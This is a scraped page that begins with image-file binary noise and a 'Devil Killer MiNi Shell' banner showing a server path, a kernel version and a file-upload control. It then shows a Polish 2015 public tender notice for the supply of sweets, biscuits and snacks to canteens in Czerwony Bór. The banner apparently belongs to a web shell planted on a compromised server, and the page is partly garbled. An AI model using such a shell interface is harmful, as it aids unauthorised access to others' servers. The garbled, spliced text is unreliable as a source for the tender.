JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150302/44658-N-2015.html

<p class="kh_header"><b>Czarne: ZP/6/CZB/2015 DOSTAWA  SŁODYCZY DO KANTYN, SKLEPU I BARU W CZERWONYM BORZE ORAZ KANTYN W PRZYTUŁACH  STARYCH I GRĄDACH WONIECKO</b><br>
<b>Numer ogłoszenia: 44658 - 2015; data zamieszczenia: 02.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorska Instytucja Gospodarki Budżetowej "POMERANIA" , ul. Pomorska 1, 77-330 Czarne, woj. pomorskie, tel. 59 833 36 79, faks 59 833 24 30.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/6/CZB/2015 DOSTAWA  SŁODYCZY DO KANTYN, SKLEPU I BARU W CZERWONYM BORZE ORAZ KANTYN W PRZYTUŁACH  STARYCH I GRĄDACH WONIECKO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	Cechy produktów równoważnych	J.m.	Ilość do
1.	Baton Bounty  57g	Baton składający się z masy wiórków kokosowych oblanych mleczną czekoladą, w opakowaniu znajdują się dwa batony, nie więcej niż 278 kcal/57g.	szt.	1000
2.	Baton Mars  47 g	Baton składający się z nugatowego nadzienia oblanego gęstym karmelem i mleczną czekoladą, nie więcej niż 212 kcal/47g.	szt.	3500
3.	Baton Mars Carmel 45 g	Baton w czekoladzie mlecznej (40%) z miękkim  nadzieniem karmelowym (60%).	szt.	2000
4.	Baton Kinder  Bueno 43g	Baton w formie wafelka pokryty mleczną czekoladą, wypełniony mleczno-orzechowym nadzieniem, w jednym opakowaniu znajdują się dwa oddzielnie pakowane batoniki, jeden pojedynczy batonik nie może zawierać więcej niż 122 kcal/21,5g.	szt.	1500
5.	Baton Milky Way  21,5g	Baton z puszystym nadzieniem oblanym mleczną czekoladą, nie więcej niż 97,61 kcal/21,5g.	szt.	1000
6.	Baton Kit Kat 40g	Baton w formie kruchego paluszka waflowego (31,5%) w mlecznej czekoladzie(68,5%), nie więcej niż 213 kcal/40g.	szt.	2000
7.	Baton Kit Kat Chunky 42g	Baton w formie kruchego paluszka waflowego pokrytego kremem arachidowym w mlecznej czekoladzie, nie więcej niż 226 kcal/42g.	szt.	1000
8.	Baton Kit Kat White 40g	Baton w formie kruchego paluszka waflowego (31,5%) w białej czekoladzie czekoladzie(68,5%), nie więcej niż 215 kcal/40g.	szt.	1000
9.	Baton Lion Peanut 40g	Baton w formie wafla z karmelemi i płatkami pszennymi oraz orzechami arachidowymi w polewie czekoladowej, nie więcej niż 197 kcal/40g.	szt.	2000
10.	Baton Lion 42g	Baton w formie wafla przekładanego karmelem, obsypanego chrupkami ryżowymi w polewie kakaowej.	szt.	2000
11.	Baton Lion White 42g	Baton w formie wafla przekładanego karmelem i płatkami pszennymi w plewie z białej czekolady, nie więcej niż 200 kcal/42g.	szt.	2000
12.	Baton Snickers  51g	Baton składa się z orzeszków ziemnych(24%), karmelu(27%) i nadzienia nugatowego(14%) polanych mleczną czekoladą(35%), nie więcej niż 260 kcal/51g.	szt.	6000
13.	Baton Twix 51 g	Baton zawiera dwa cienkie, podłużne, herbatnikowe ciasteczka(25%) o długości 110 mm pokryte warstwą karmelu(32%) i oblane mleczną czekoladą(35%). Nie więcej niż 251kcal/51g.	szt.	1500
14.	Baton Pawełek 45g	Baton z nadzieniem (toffi, śmietankowy, czekoladowy, wiśniowy) oblany mleczną czekoladą, nie więcej niż 209kcal/45g.	szt.	1000
15.	Baton Bajeczny Wedel 45g	Baton o smaku orzechowym z dodatkiem wafelków(46%) oblany mleczną czekoladą, nie więcej niż 247kcal/45g.	szt.	300
16.	Baton Pierrot Wedel 45g	Baton orzechowy oblany mleczną czekoladą (21%)  z orzechami arachidowymi(25%), nie więcej niż 248 kcal/45g.	szt.	300
17.	Baton 3Bit 51 g	Baton w czekoladzie mlecznej(46%) z nadzieniem mlecznym(33%) i herbatnikami.(13%), nie więcej niż267,75 kcal/51g.	szt.	2000
18.	Czekolada Alpen Gold z okienkiem Nussbeisser 100g	Czekolada mleczna z całymi orzechami laskowymi, nie więcej niż 570 kcal/100g.	szt.	2000
19.	Czekolada Alpen Gold z okienkiem Nussbeisser Biała 100g	Czekolada biała z całymi orzechami laskowymi, nie więcej niż 570 kcal/100g.	szt.	1000
20.	Czekolada Alpen Gold 100g (różne smaki)	Zawartość masy kakaowej w czekoladzie mlecznej nie mniej niż 25%, masa netto nie mniejsza niż 100 g(mleczna, mleczna z nadzieniem truskawkowym, mleczna z orzechami laskowymi, biała, gorzka o zawartości masy kakaowej minimum 46%, opakowanie: jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	2500
21.	Czekolada Milka 100g 	Czekolada o następujących właściwościach: zawartość masy kakaowej w czekoladzie mlecznej min 30%, masa netto niemniejsza niż 100 g (mleczna, biała, mleczna z białą czekoladą, mleczna z nadzieniem kakaowym, mleczna z nadzieniem mlecznym o smaku, karmelowym, amaretto, mleczna z rodzynkami i orzechami laskowymi, z orzechami laskowymi, gorzka. opakowanie jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	4000
22.	Czekolada Terrawita 100g(rózne smaki: mleczna, gorzka,biało-czarna,tiramisu nadziewana,truflowa nadziewana, eppresso, fistaszkowa, pistacjowa, migdałowa, miętowa,adwokat)	Czekolada o następujących właściwościach: zawartość masy kakaowej nie mniej niż 25 %, masa netto nie mniej niż 100 g ( mleczna, gorzka,biało-czarna,tiramisu nadziewana,truflowa nadziewana, eppresso, fistaszkowa, pistacjowa, migdałowa, miętowa,adwokat)	szt.	3500
23.	Czekolada Wedel  100g(różne smaki)	Zawartość masy kakaowej w czekoladzie nie mniej niż 50%, masa netto nie mniejsza niż 100 g(mleczna, gorzka, gorzka wiśniowa, mleczna malinowa, mleczna toffi, mleczna truskawkowa, mleczna z bakaliami, mleczna jagodowa i poziomkowa, deserowa, gorzka o smaku migdałowym, mleczna z nadzieniem toffi, mleczna z bakaliami)	szt.	4000
24.	Herbatniki deserowe  Łakotki	Herbatniki różne smaki, wartość energetyczna w 100g nie mniejszej niż 500 kcal, masa netto nie mniej niż 168g; opakowanie: foliowe, zamknięte, chroniące przed dostępem powietrza, dodatkowo w kartonowym pudełku.	szt.	2000
25.	Delicje Milka ChocoJaffa z musem toffi 128g	Biszkopty z pianką o smaku toffi oblane mleczną czekoladą, zawartość masy kakaowej w czekoladzie mlecznej minimum 30%.	szt.	1000
26.	Delicje szampańskie  147g Wedel(rózne smaki:wiśnioew,pomarańczowe,malinowe,jagodowe,morelowe)	Biszkopty z galaretką oblane czekoladą.	szt.	3000
27.	Ciastka Holenderskie w czekoladzie 188g	Półsłodkie herbatniki oblane mleczną czekoladą,czekolada mleczna niemniej niż 30,5%)	szt.	2000
28.	Ciastka Holenderskie bez czekolady 168g	Półsłodkie herbatniki.	szt.	500
29.	Herbatniki Oreo 176g	Herbatniki kakaowe o smaku waniliowym, zawartość kremu nie mniej niż 29%.	 	300
30.	Krakersy  180g	Składniki:mąka pszenna 79,5%,olej palmowy, cukier 12%, syrop glukozowo-fruktozowy,substancje spulchniające,sól, aromat, zawireja pszenicę,gluten,siarczyny. 	szt.	500
31.	Herbatniki Pieguski  120g czekolada-Wedel	Ciasteczka z kawałkami czekolady mlecznej, granulki czekolady mlecznej niemniej niż 32%.	szt.	1500
32.	Herbatniki Jeżyki 140g Jutrzenka	Herbatniki z karmelem, orzechami laskowymi, czekoladą mleczną - nie mniej niż 35%,miazgą kakaową, rodzynkami, masą karmelową nie mniej niż 32%, (dostępne w innych smakach: classic, kokosowe, kawowe itp.) masa netto nie mniej niż 140 g, opakowanie jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	1500
33.	Herbatniki Hit 250g	Herbatniki z kremem o smaku czekoladowym, wartość energetyczna w 100 g: 492 kcal, białko w 100 g :6,10 g,                                       węglowodany w 100 g: 63,20 g, tłuszcz w 100 g: 23,90 g.	szt.	3000
34.	Ciastka petit beurre 350g	Herbatniki,masa nie mniej niż 350 g, opakowanie: foliowe, zamknięte, chroniące produkt przed dostępem powietrza.	szt.	1000
35.	Herbatniki Petit beurre 50g	Herbatniki extra kruche, masa: nie mniej niż 50g, opakowanie: foliowe, zamknięte, chroniące produkt przed dosępem powietrza.	szt.	3000
36.	Pierniczki w czekoladzie Baśniowe Skawa 150g	Pierniczki oblane czekoladą z nadzieniem różnosmakowym (np. truskawkowym, śliwkowym, owocowym itp.) w ilości nie mniejszej niż 29,0%, zawartość czekolady nie mniejsza niż 18%, o masie netto nie mniejszej niż 150g, opakowanie: jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	2000
37.	Herbatniki afrykańskie ZOO-czekolada 170 g	Drobne ciasteczka w kształtach zwierząt o smaku maślanym w czekoladzie, opakowanie: kartonik, w nim folia jednorazowa chroniąca przed dostępem powietrza.	szt.	100
38.	Ciastka Krakuski 200g	Kruche ciasteczka o róznych smakach(maślane, kokosowe, o smaku szrlotki, deserowe, śmietankowe z płatkami czekolady), masa nie mniej niż 200g., opakowanie: jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	1000
39.	Wafle torcikowe Wedel 160g	Mini wafelki. Masa netto nie mniej niż 160g. opakowanie: jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	200
40.	Biszkopty 250g	Ciasteczka biszkoptowe, skład: masa jajeczna, mąka pszenna, woda, cukier, emulgatory (E471, E475), mąka ziemniaczana, syrop cukru inwertowanego, supstancje spulchniające (E450), masa netto nie mniej niż 250g.	szt.	200
41.	Biszkopty 120g	Ciasteczka biszkoptowe, skład: masa jajeczna, mąka pszenna, woda, cukier, emulgatory (E471, E475), mąka ziemniaczana, syrop cukru inwertowanego, supstancje spulchniające (E450), masa netto nie mniej niż 120g.	szt.	1500
42.	Wafle Grześki -czekolada 	Wafel przekładany kremem kakaowym w czekoladzie, wartość energetyczna w 100 g produktu: nie mniej niż 524 kcal, masa: nie mniej niż 50 g, opakowanie: jednorazowe, foliowe, chroniące produkt przed dostępem powietrza.	szt.	9000
43.	Wafel Princessa  35-37g	Delikatny wafelek oblany czekoladą, różne smaki: czekoladowa, kokosowa, mleczna, orzechowa, masa: nie mniej niż 36g; opakowanie:jednorazowe, chroniące przed dostępem powietrza.	szt.	1500
44.	Wafel Góralki 50g mix	Wafelki ( różne smaki: mleczne, czekoladowe, orzechowe) oblewane obwodowo polewą czekoladową, przekładane kremem, masa nie mniej niż 50g, opakowanie: zamknięte, foliowe, chroniące produkt przed dostępem powietrza i wilgocią.	szt.	30000
45.	Wafel Prince Polo XXL 52g	Wafelek oblewany czekoladą (rózne smaki - classic, orzechowy, mleczny), o zawarości czekolady nie mniejszej niż 30%, zawartoścki kremu czekoladowego nie mniej niż 49%, masa netto nie mniej niż 52 g, opakowanie jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	3000
46.	Wafle Familijne 180g Jutrzenka	Wafle przekładane kremem o róznych smakach (orzechowym, kakaowym, kakaowo śmietankowym, truskawkowo-śmietankowym, chałwowym) o masie netto nie mniejszej niż 180g, opakowanie jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	4000
47.	Wafle suche kwadratowe duże	Wafle tortowe suche kwadra,. masa netto: 146g, opakowanie składające się z 4 wafli o wymiarach 28*28 cm.	szt.	600
48.	Dropsy HALLS	Cukierki do ssania dostępne nie mniej niż sześciu smakach, masa: nie mniej niż 33 g, opakowanie: każdy cukierek zapakowany jest w papier, całość ułożona w dropsa i zamknięta w papier, chroniąc produkt przed dostępem powietrza i wilgocią.	szt.	700
49.	Cukierki  lodowe ICE Fresh 125g	Twarde karmelki o smaku lodowym, składniki: cukier, syrop glukozowy, kwasek cytrynowy i kwas mlekowy.	szt.	200
50.	Cukierki Kukułki 120g	Twarde cukierki o smaku karmelowym w charakterystyczne białe paseczki z nadzieniem kakaowym. 	szt.	100
51.	Cukierki Raczki 120g	Twarde cukierki o zniewalającym rumowym aromacie i smaku orzechów zatopionych w karmelowym nadzieniu. 	szt.	100
52.	Cukierki Werthers Orginal 90g	Twarde cukierki o smaku karmelowym, składniki: cukier, syrop glukozowy, śmietanka (7%), serwatka słodka skondensowana, masło (4,5%), syrop sacharazowy, sól, tłuszcz mleczny, emulgator: lecytyna sojowa, aromat: wanilia	szt.	100
53.	Cukierki Nimm-2 z witaminami 90g	Cukierki owocowe z nadzieniem i witaminami, smaki: pomarańcza, malina, limonka; wartość energetyczna w 100 g produktu: nie mniej niż 368 kcal, masa nie mniej niż 90 g, opakowanie: jednorazowe, foliowe, chroniące produkt przed dostępem powietrza.	szt.	100
54.	Cukierki Kopiko 100g	Twarde cukierki o mocno kawowym smaku i aromacie, zawierające prawdziwą kawę, extrat kawowy nie mniej niż 4,9%.	szt.	100
55.	Cukierki Alpen Liebe 125g	Twarde cukierki z karmelem truskawkowo-śmietankowym, wygląd- czerwonobiały wirek.	szt.	100
56.	Cukierki czekoladowe Mieszanka Wedlowska 220g	Rodzaje cukierków: orzechowy z wafelkami, kokosowy, galaretka o smaku truskawkowym, mleczno-karmelowym, orzechowy, galaretka o smaku coli, waniliowym; masa kakaowa: nie mniej niż 47%.	szt.	100
57.	Landrynki owocowe  90g	Cukierki twarde o smaku owocowym o masie netto nie mniejszej niż 90 g, opakowanie: jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	2000
58.	Landrynki miętowe 90g	Cukierki twarde o smaku mięty, o masie netto nie mniejszej niż 90 g, opakowanie: jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	2000
59.	Żelki Haribi Roulette 25g	Owocowe żelki o smaku: soczystej pomarańczy, egzotycznego ananasa, kwasnej cytryny, słodkiej maliny, świeżej truskawki oraz czarej porzeczki zapakowane w wygodne rolki.	szt.	100
60.	Draże Tic Tac 16g	Drażetki dostępne nie mniej niż w pięciu smakach, wartość energetyczna jednej drażetki: nie mniej niż 2 kcal, masa: nie mniej niż 16 g, opakowanie: pudełkoplastikowe z wieczkiem umożliwiającym wielokrotne zamykanie.	szt.	200
61.	Guma rozpuszczalna Mamba 27,5g	Gumy rozpuszczalne w owocowych smakach, nie mniej niż 6 gum w jednej kostce.	szt.	100
62.	Czekoladki Kinder 50g	Batoniki pojedynczo pakowane z mlecznej czekolady z nadzieniem mlecznym, opakowanie: kartonik.	szt.	450
63.	Jajko Kinder Niespodzianka 20g	Słodkie jajko z niespodzianką pokryte mleczną czekoladą, zawiera zabawkę(małe części), sucha masa mleczna nie mniej niż 32%.	szt.	150
64.	Drops Mentos 38g	Drażetki do zucia o smaku owocowym i miętowym,nie mnie niż 14 sztuk drażetek w opakowaniu.	szt.	100
65.	Lizak owocowy	Lizak owocowy, zwykły w kształcie serduszka.	szt.	1000
66.	Lizak Chupa Chups	Lizak na patyczku, rózne smaki, nie mniej niż 11g.	szt.	500
67.	Paluszki Lajkonik 200g 	Paluszki solone oraz o smaku zielonej cebulki, masa netto nie mniej niż 200g., opakowanie jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	1000
68.	Precelki Lajkonik 130g 	Paluszek w kształcie precla, nie więcej niż 392 kcal/100g.	szt.	500
69.	Paluszki Beskidzkie 70g	Masa netto nie mniejsza niż 70 g, wartość odżywcza w 25 g nie mniejsza niż: energetyczna 99 kcal, cukry 0,9 g, tłuszcze 1,4 g, opakowanie jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	400
70.	Paluszki Beskidzkie 220g	Mix smaków (solone, ser i cebula, bekonowe, z sezamem, makiem,pikantne), o masie netto nie mniejszej niż 220 g., wartość odżywcza w 25 g nie mniejsza niż: energetyczna 79 kcal, cukry-1,0 g, tłuszcze-1,6 g, opakowanie jednorazowe, foliowe, chroniące przed dostępem powietrza.	szt.	1000
71.	Talarki krakowskie Lajkonik 170g	Cienkie, chrupiące krążki, składniki: mąka pszenna, tłuszcz roślinny, sól(3,5%), jęczmienny ekstrat słodowy, regulator kwasowości, nie więcej niż 431 kcal/100g.	szt.	300
72.	Rogal 7 Days  65g	Rogalik z nadzieniem kakaowym, masa netto nie mniej niż 65 g, nadzienie kakaowe nie mniej niż 25%.	szt.	4000
73.	7 Days Borseto 80 g	Bułka z ciasta francuskiego z nadzieniem kakaowym, jabłkowo-cynamonowym, owoce leśne, karmelowym 	szt.	3000
74.	Bombonierka Merci 250g	Nadziewanie i nienadziewane czekoladki w czekoladzie mlecznej i deserowej, masa kakaowa: w czekoladzie pełnomlecznej z nadzieniem nugatowym 32%, w czekoladzie śmietankowej minimum 36%, w czekoladzie pełnomlecznej z orzechami i migdałami minimum 32%, w czekoladzie pełnomlecznej z nadzieniem pralinowym minimum 32%, w czekoladzie deserowej minimum 45%, w czekoladzie deserowej z nadzieniem marcepanowym minimum 48%, w czekoladzie deserowej z musem czekoladowym minimum 48%, w czekoladzie białej i w czekoladzie kawowo-śmietankowej: czekolada śmietankowa minimum 33%, biała czekolada minimum 28%.	szt.	100
75.	Bombonieka Rafaello 150g	Chrupiący wafelek w kształcie kuleczki z całym migdałem w środku, obsypany kokosami.	szt.	100
76.	Baryłki Wedel 200g	Baryłki Coctail  o smaku kakaowym z gęstym nadzieniem alkoholowym, czekolada deserowa nie mniej niż 50%.	szt.	50
77.	Bombonierka Toffifee 125g	Orzech laskowy(15%) w karmelu(41%), kremie orzechowym(37%) i czekoladzie(12%), opakowanie nie mniej niż 15 sztuk. 	szt.	150
78.	Chałwa sezamowa 65 g Odra	Miazga sezamowa nie mniej niż 46,2%, opakowanie: jednorazowe, foliowe, chroniące produkt przed dostępem powietrza.	szt.	3000
79.	Ptasie mleczko 380g Wedel	Delikatna pianka oblana mleczną czekoladą, produkt zawierający nie mniej niż 36 kostek; masa: nie mniej niż 380g; opakowanie: karton, zamknięte, chroniące przed dostępem powietrza.	szt.	300
80.	Ptasie mleczko Milka 350g	Delikatna pianka ptasie mleczko dostępna w następujących smakach: czekoladowym, waniliowym oblana delikatną czekoladą mleczną lub deserową; masa: nie mniej niż 350g; opakowanie: karton, zamknięte, chroniące przed dostępem powietrza.	 	300
81.	Piernik tumski 250g Mamut	Miękkie i delikatne ciasto oblane polewą kakaową, przekładany marmoladą owocową i kremem, masa nie mniej niż 250g; opakowanie: foliowe, zamknięte, chroniące produkt przed dostępem powietrza i wilgocią.	szt.	500
82.	Gofry 250g Dan Cake	Gofry o ciemnozłotej skórce, jaja nie mniej niż 32%, ilość sztuk w opakowaniu nie mnie niż 6, opakowanie: foliowe, zamknięte, chroniące produkt przed dostępem powietrza.	szt.	200
83.	Ciasto czekoladowe Dan Cake 400g	Ciasto kakaowe z drażetkami czekoladowymi oblane polewą kakaową, masa: nie mniej niż 400 g, opakowanie: foliowe, zamknięte, chroniące produkt przed dostępem powietrza i wilgocią.	szt.	500
84.	Ciasto z nadzieniem Dan Cake 300 g	Ciasto o smaku cytrynowym z nadzieniem dostępnym w następujących smakach: truskawkowym, wiśniowym, malinowym, jagodowym w polewie kakaowej; masa: nie mniej niż 300g; opakowanie: foliowe, zamknięte, chroniące produkt przed dostępem powietrza i wilgocią.	szt.	500
85.	Rolady Dan Cake 300g	Ciasto biszkoptowe z kremem waniliowym i nadzieniem truskawkowym, malinowym udekorowane polewą kakaową; masa: nie mniej niż 300g; opakowanie: foliowe, zamknięte, chroniące produkt przed dostępem powietrza i wilgocią.	szt.	500
86.	Ciasto marmurkowe Dan Cake 400g	Ciasto waniliowo-kakaowe, oblane polewą kakaową, masa: mie mniej niż 400 g; opakowanie: foliowe, zamknięte, chroniące produkt przed dostępem powietrza i wilgocią.	szt.	400
87.	Sezamki 27g Wedel	Ziarno sezamowe (44%), syrop glukozowy, cukier, zawiera nasiona sezamu.	szt.	3000.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.81.21.00-4, 15.84.22.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie ustanawia obowiązku wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania tego warunku Zamawiający dokona przy użyciu formuły spełnia- nie spełnia na podstawie złożonego oświadczenia zawartego w formularzu ofertowym załącznik A do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania tego warunku Zamawiający dokona przy użyciu formuły spełnia- nie spełnia na podstawie złożonego oświadczenia zawartego w formularzu ofertowym załącznik A do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania tego warunku Zamawiający dokona przy użyciu formuły spełnia- nie spełnia na podstawie złożonego oświadczenia zawartego w formularzu ofertowym załącznik A do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania tego warunku Zamawiający dokona przy użyciu formuły spełnia- nie spełnia na podstawie złożonego oświadczenia zawartego w formularzu ofertowym załącznik A do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania tego warunku Zamawiający dokona przy użyciu formuły spełnia- nie spełnia na podstawie złożonego oświadczenia zawartego w formularzu ofertowym załącznik A do SIWZ</p>
